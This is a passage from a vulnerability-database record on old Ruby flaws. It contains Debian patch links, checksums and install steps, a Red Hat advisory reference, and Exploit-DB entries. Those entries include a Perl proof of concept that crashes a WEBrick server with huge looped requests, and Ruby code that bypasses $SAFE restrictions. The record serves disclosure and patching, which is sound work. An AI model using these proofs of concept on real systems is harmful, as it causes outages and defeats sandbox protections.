href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1538434 b88e43e5cec1aacf83a598dab477c3ab\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1667992 01b49904e244952345158c4e22006a42\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 299462 1e7905d97c9ec5f2dffdd8dd22b48002\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 279298 5823c4a9baf7975c73eb6d36047dfed4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1059442 dba878a9064478b59f1548cf661041f7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 793388 f945925d054d92aba8ca6f7e46a685ee\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 216340 c676c1ea64ad2b41ee571249b99568d9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 197742 9dfdbf8675ab4a56dfbfdeaa7bb6f733\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 216192 3ec8e74d7b723d246719dd9227862c8a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 367552 b0a7a4121cca96fc576497e5eeb7d664\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 858608 9f415ec47bba07a78331e26e35300a5b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1837532 6face0d7dcc576c00e564c66d5e78d42\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 198096 80b334507f4cbfc62b2a439e5d6f3f2e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 235700 826646ac1e00564ab805d15ac64659bd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 197150 b5c725b9fe159d6b3ddb9a1d607d5516\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1830428 4123d91e58c7e5f0c4a784d5087f929e\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 218314 45b937607b0c710f9651a88e3c77734a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1808952 c905cd43d26918def2c2110b0d0787b8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1844840 4698433b87fa56b6f7c8cf581f9ad4c0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 777146 a01b49460afc4733cff7d1da5c3892ca\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 219458 02100fb307634e08fd304f830fa73115\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 372960 2e69a084e4ecc663d54a885b69cd4d87\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 199768 14727fe59c8a774dc0ce5283bbe3adf4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 218562 6ef5bfa416e85714847e7911ad15b7bc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 294044 404be1b8ba5d7b1de693949bf7509c50\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 237306 abd5d03c1a8c5e730fbbb3b7cbfc13a3\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 217678 56fc7c04ec11e80b958592b53698f2cb\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 312482 489f3cd6e21ef98d9b3d4031313e0ff8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 199536 1a549205c85f26df75918ee1f5c5a5e6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1107170 e3be222facad68b2ea2c1d743bfe7729\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 200076 a9030c3b873cf7feca45d7fb18b2c1c5\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1837356 f519218b7727c4c0064d87052a32cd57\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 719018 ff1d0ace8eeec5d602e0cc94c3b834ae\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1592732 37cfd2a2da9ab0c297cd3e3e2d44d9b0\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 327762 27db76dd87740f49cf998c08d7ab567c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 1855938 622f315ff7c5c3e488b364102dff54bd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 217518 c56bb0699f151595c7cea6cc0d002476\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 217572 74f4d455673a8cedbbd19f03cd1a68bf\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 779594 1da6fea9a757a6147bccd1be029efc77\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 884422 dd7a11cbdee41fc9efbfeb616236c261\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 1849714 09fcada1e82f4f89b7cff7bb556ac055\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 235540 3431f6c302e74a70f0e31b13ee703c19\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 1052398 95816bfd6638c6c6cf7c8c91f8a5a6df\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 305308 1123e31b1920e3e7f1ac216eddaaba37\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 1838936 4accc47fcb960eaa9b04a6ff450c678b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 218044 d92f877014b653c14260db06cfa0844e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 199000 3c6e11cc181a6593505e20279d310a03\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 198678 9b90584a77a43162a15087943f9596be\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 199480 65c1e5b6224a9a5ed5f1afe4053e9e97\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 218054 147f93ceaf0c8119ca264957ffc7c51a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 371520 61de55d36d7fadd6f885a4021bebc229\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 1620382 7a7339edea525e5d5bc6f8c794a8c3e7\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 197218 5ddc1259eef42b0c05439cb8ab731942\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 197994 3ab96c368edc3bce77e73b529c4c5b84\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 1833286 c7f9f992093cacfb766259e889de13ba\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 960816 c43630f6bbb40fb21fffdc0ad516ddfe\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 197944 2d534c9e73f36b3b75e01f2f20bfb6c6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 296102 c192762dbeaf435d11e51448565bc9b1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 741330 59352ae48a97d10d96d23f84f8e3d4d7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 1543188 313ab5a0048823ce919bf50a1b3f1de9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 217960 208c79695f22f705f70ecce79efa87b4\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:0897-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:0897-01\uff1aModerate: ruby security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-0897.html target=_blank rel=external nofollow>https://www.redhat.com/support/errata/RHSA-2008-0897.html</a>", "modified": "2009-01-06T00:00:00", "published": "2009-01-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4621", "id": "SSV:4621", "title": "Ruby regex.c\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-01T00:29:57", "bulletinFamily": "exploit", "description": "Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit. CVE-2008-3443. Dos exploits for multiple platform", "modified": "2008-08-13T00:00:00", "published": "2008-08-13T00:00:00", "id": "EDB-ID:6239", "href": "https://www.exploit-db.com/exploits/6239/", "type": "exploitdb", "title": "Ruby <= 1.9 regex engine Remote Socket Memory Leak Exploit", "sourceData": "-------------------------------------------------------\nLanguage : Ruby \n\nWeb Site: www.ruby-lang.org\n\nPlatform: All\n\nBug: Remote Socket Memory Leak\n\nProducts Affected:\n1.8 series:\n- 1.8.5 and all prior versions\n- 1.8.6-p286 and all prior versions\n- 1.8.7-p71 and all prior versions\n\n1.9 series\n- r18423 and all prior revisions\n\nConfirmed by the vendor: Yes\n\nPatch available : Yes\n-------------------------------------------------------\n\n1) Introduction\n2) Bug\n3) Proof of concept\n4) Credits\n\n===============\n1) Introduction\n===============\n\"A dynamic, open source programming language with a focus on simplicity and productivity.\nIt has an elegant syntax that is natural to read and easy to write.\"\n\n=======\n2) Bug\n=======\nRuby fails to handle properly the memory allocated for a socket\nSo when you send ~ 4 big request to a ruby socket, ruby will go \nin infinite loop, and then crash.\nThe bug reside in the regex engine (in regex.c).\n\n==================\n3)Proof of concept\n===================\nThis poc is an exemple for Webrick web server\ncrap.pl :\n\n#!/usr/bin/perl\nuse LWP::Simple;\nmy $payload = \"\\x41\" x 49999999;\nwhile(1)\n{\nprint \"[+]\\n\";\nget \"http://127.0.0.1:2500/\".$payload.\"\";\n}\n\nResult (Exemple on Webrick web server):\n\n[2008-07-11 22:39:55] INFO WEBrick 1.3.1\n[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux]\n[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500\n[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory\n /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line'\n /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse'\n /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run'\n /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'\n /usr/lib/ruby/1.8/webrick/server.rb:162:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'\n /usr/lib/ruby/1.8/webrick/server.rb:95:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:92:in `each'\n /usr/lib/ruby/1.8/webrick/server.rb:92:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:23:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:82:in `start'\n /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch'\n script/server:62\n[FATAL] failed to allocate memory\nroot@audit:/home/audit#\n\n=====\n5)Credits\n=====\n\nlaurent gaffi\u0102\u0083\u00c2\u0160\n\nlaurent.gaffie{remove_this}[at]gmail[dot]com\n\n# milw0rm.com [2008-08-13]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6239/"}, {"lastseen": "2016-02-03T16:28:49", "bulletinFamily": "exploit", "description": "Ruby 1.9 Safe Level Multiple Function Restriction Bypass. CVE-2008-3655 . Remote exploits for multiple platform", "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "EDB-ID:32224", "href": "https://www.exploit-db.com/exploits/32224/", "type": "exploitdb", "title": "Ruby <= 1.9 Safe Level Multiple Function Restriction Bypass", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n \r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n \r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n \r\n- An error affecting 'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n \r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n \r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n \r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\nclass Hello\r\n def world\r\n Thread.new do\r\n $SAFE = 4\r\n msg = \"Hello, World!\"\r\n def msg.size\r\n self.replace self*10 # replace string\r\n 1 # return wrong size\r\n end\r\n msg\r\n end.value\r\n end\r\nend\r\n\r\n$SAFE = 1 # or 2, or 3\r\ns = Hello.new.world\r\nif s.kind_of?(String)\r\n puts s if s.size < 20 # print string which size is less than 20\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32224/"}, {"lastseen": "2016-02-03T16:28:40", "bulletinFamily": "exploit", "description": "Ruby 1.9 dl Module DL.dlopen Arbitrary Library Access. CVE-2008-3655,CVE-2008-3657. Remote exploits for multiple platform", "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "EDB-ID:32223", "href": "https://www.exploit-db.com/exploits/32223/", "type": "exploitdb", "title": "Ruby <= 1.9 dl Module DL.dlopen Arbitrary Library Access", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n \r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n \r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n \r\n- An error affecting 